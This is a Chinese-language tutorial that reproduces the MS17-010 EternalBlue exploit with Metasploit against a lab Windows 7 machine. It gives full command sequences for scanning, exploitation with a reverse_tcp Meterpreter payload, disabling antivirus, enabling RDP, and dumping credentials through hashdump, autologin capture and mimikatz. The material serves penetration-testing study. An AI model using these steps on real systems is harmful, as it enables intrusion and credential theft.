1. 程式人生 > >23.通過MS17_010來學習msf對滲透的利用

23.通過MS17_010來學習msf對滲透的利用

 

Metersploit 集成了滲透階段的全部利用,從漏洞探測,到漏洞利用,最後到後滲透階段。本次部落格主要拋磚引玉,通過對MS17_010漏洞的復現,來學習Metasploit。

漏洞環境:

      靶機:windows 7 (192.168.0.135)

      攻擊機:kali 2018 (192.168.0.133)

開始之前先來熟悉 Metaspolit 基本術語:

Auxiliaries(輔助模組),Exploit(漏洞利用模組),Payload(攻擊載荷模組),Post(後期滲透模組),Encoders(編碼工具模組)

1.載入smb掃描模組

msf > search auxiliary/scanner/smb

發現可利用的smb_ms17_010模組

2.載入漏洞掃描模組對ip段進行漏洞掃描:

msf > use auxiliary/scanner/smb/smb_ms17_010

msf > set rhosts 192.168.0.100-150

msf > set threads 10

msf > run

發現 192.168.0.135 這臺主機可能存在MS17_010漏洞

3.利用nmap對漏洞主機進行探測:

msf > nmap -T4 -A 192.168.0.135

發現敏感埠139,445開啟

4.搜尋MS17_010可利用漏洞模組

msf > search ms17_010

(沒有的話 git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit.git)

5.載入漏洞利用模組,設定引數

msf > use exploit/windows/smb/ms17_010_eternalblue

msf > set lhost 192.168.0.133

msf > set rhost 192.168.0.135

msf > set payload windows/x64/meterpreter/reverse_tcp

msf > exploit

可以看到漏洞利用成功,現在是 system 最高許可權

6.資訊檢視

檢視系統資訊:

meterpreter > sysinfo

檢視是否為虛擬機器:

meterpreter > run post/windows/gather/checkvm

檢視目標機執行時間:

meterpreter > idletime

檢視完整網路設定:
meterpreter > route

關閉防毒軟體:

meterpreter > run post/windows/manage/killav

啟動目標機的遠端桌面協議,開啟3389埠:

meterpreter > run post/windows/manage/enable_rdp

可以看到已經成功啟動了遠端桌面。

列舉當前登陸過的使用者:

meterpreter > run post/windows/gather/enum_logged_on_users

可以看到有 SecEvery,Administrator兩個使用者。

列舉安裝在目標機上的應用程式:

meterpreter > run post/windows/gather/enum_applications

將當前Meterpreter終端隱藏在後臺:

meterpreter > background

需要重新呼叫終端:

meterpreter > sessions -i 1

 

很多使用者習慣將計算機設定為自動登陸,下面這個命令可以抓取自動登陸的使用者名稱和密碼:

meterpreter > run windows/gather/credentials/windows_autologin

下載c盤下1.txt檔案到/home目錄下:

meterpreter > download c:\txt /home

上傳/home目錄下1.txt檔案到c盤下:

meterpreter > upload /home/1.txt c:\

密碼抓取:

1.使用Hashdump抓取密碼

Hashdump Meterpreter指令碼可以從目標機中提取Hash值,破解Hash值即可獲得登陸密碼。計算機中的每個賬號(如果是域伺服器,則為域內的每個賬號)的使用者名稱和密碼都儲存在sam檔案中,當計算機執行時,該檔案對所有賬號進行鎖定,要想訪問就必須有“系統級”賬號。所以要使用改名了就必須進行許可權提升。

在Meterpreter Shel提示符下輸入hashdump命令,將匯出目標機sam資料庫中的Hash:

2.使用Mimikatz抓取密碼

載入mimikatz模組:

meterpreter > load mimikatz

看了大概使用方法後,既可以使用Metasploit內建的命令,也可以使用Mimikatz自帶的命令從目標機器上匯出Hash和明文證書。

抓取系統Hash:

meterpreter > msv

md5解密:

抓取系統票據:

meterpreter > kerberos

獲取系統賬戶資訊:

 

參考連結:

https://xz.aliyun.com/t/2536

https://www.cnblogs.com/lsgxeva/p/8450277.html

https://www.cnblogs.com/backlion/p/6804863.html